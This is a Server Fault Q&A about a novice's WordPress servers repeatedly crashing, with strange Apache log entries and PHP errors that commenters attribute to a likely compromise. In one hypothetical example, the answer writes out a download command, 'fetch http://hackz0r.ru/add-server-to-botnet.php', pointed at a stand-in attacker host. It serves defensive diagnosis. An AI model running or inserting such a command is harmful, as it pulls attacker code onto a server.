0

Possible Duplicate:
My server’s been hacked EMERGENCY

Okay, I'm a noobie. I know how to build and compose a website, but I have no idea what I'm doing when it comes to servers and server commands, etc.

I've recently had a problem with all of my sites on our servers going down all at once and then I have to go in and reboot the server for them to come up again. At first this was annoying, but now it is becoming agonizing as it now takes 3-4 reboots for the websites to come back up.

I contacted support for my hosting, but they are not being very helpful. They just keep telling me what the issue might be and basically telling me that I'm going to have to look into it and figure it out, which really isn't possible since I know nothing.

Anyway, here are the things they said were possible reasons:

  1. They said I have "strange logs" in my Apache webserver log, error: sh: fetch: command not found.

  2. My php.ini memory limit is: 256M which is very high. It should be 32M or 64M.

  3. Server is reaching Max Clients, meaning we have more than 150 visitors at a time. (They supposedly "fixed" this, but the sites/server are still going down)

  4. I have some Wordpress sites with plugins getting errors like:

    • PHP Warning: pack(): Type H: illegal hex digit G in...
    • PHP Fatal error: Cannot use object of type stdClass as array in...
    • PHP Fatal error: Maximum execution time of 30 seconds exceeded in...
    • PHP Fatal error: Call to undefined function file_exists() in...
    • PHP Parse error: syntax error, unexpected '<'

I know that's a lot, but I really am at wits end and have no idea what to do now. If anyone could maybe give me some advice or point me in the right direction I would greatly appreciate it! Thanks!

Oh, and here are the specs for my server:

  • RAM: 2048MB
  • CPU Shares: 40
  • Primary Disk: 50GB
  • Data Transfer: 75GB
  • Port Speed: 5Mbps
  • Type: Linux
Community
  • 1
Tyler Johnson
  • 1
  • 4
    my first guess would be that your wordpress installation(s) got hacked. – user16081-JoeT Nov 15 '12 at 15:53
  • There's something **very** wrong with your install if `file_exists()` doesn't exist. It's been in core since PHP4. – ceejayoz Nov 15 '12 at 15:56
  • What has changed recently? Have you ran any updates? What's the history like? Has this server been working fine for XXX days and now all of a sudden it stopped working? Or are these errors you have encountered while trying to build the solution? – Safado Nov 15 '12 at 15:57
  • Check compatibility issues: i.e. is PHP and/or MySQL version of your server compatible with Wordpress requirement? – Doka Nov 15 '12 at 15:54
  • Definitely sounds like you've been compromised. I bet if you look at some of the PHP files throwing odd errors you'll see "strange" code in them. Time for a sledgehammer and reinstall from known clean backups / packages... – voretaq7 Nov 15 '12 at 17:30

1 Answers1

0

Some of my thoughts ...

  1. "fetch" in it's simplest form, allows you to make a GET request from the command line. If you're finding it in the Apache logs, I'm guessing it's something like the shell_exec() function, yet the shell has no idea what "fetch" is, either because it doesn't exist or it's not within it's known PATH variable. The Apache log should show you what the offending file is that tried executing it. Look at the file and see if this code is something you expect, or if it's something like "fetch http://hackz0r.ru/add-server-to-botnet.php" or something like that. Is it legit?
  2. 256M is pretty high (128M is the current default) but it really depends on the needs of your application. If you have a script that parses A LOT of information at once and uses 200M to do it, well then I would say that 256M is just right (although you might consider looking at optimizing). Really, that limit sets a barrier on how much RAM an individual script can use. So having it at 256M may not be the end of the world.
  3. If you have the horse power, raise your Max clients. This dictates how many connections Apache can handle. Enable server-status and check out your stats to get a better idea of what it's talking about. You have to look at your traffic (demand) and see whether you're reaching your limit (supply). If you are, then raise the limit. But before you raise the limit, make sure your server can handle it (CPU, RAM, Network).
  4. Those error's definitely show that something is wrong. As ceejayoz said, file_exists() has been in core since PHP4, so if it doesn't know what that function is, you either have a really old version of PHP, or something is broken. The execution time reaching 30 seconds is a setting in php.ini that dictates how long a single script can run. If it reaches that limit, it stops the script. So something within your app took longer than 30 seconds to do it's job, so the command stopped.

It is possible that you got hacked, but it is also very possible that this server was put together very poorly. You should look into some monitoring software, like Nagios, WhatsUp Gold, Munin, SolarWinds, etc. etc. which can help you analyze these types of problems. Read through your Apache log and look for suspicious items. Don't rely on your host to do it. If you don't know how, than I suggest you either learn how, or you hire someone else to manage the server for you.

Safado
  • 4,726
  • 7
  • 35
  • 53
  • 1
    since it sounds like things had originally worked fine (and still sometimes do, apparently), imo it's much more likely he got hacked, i see it with out-of-date wordpress installations often. – user16081-JoeT Nov 15 '12 at 16:26
  • Yeah, you're probably right. – Safado Nov 15 '12 at 16:31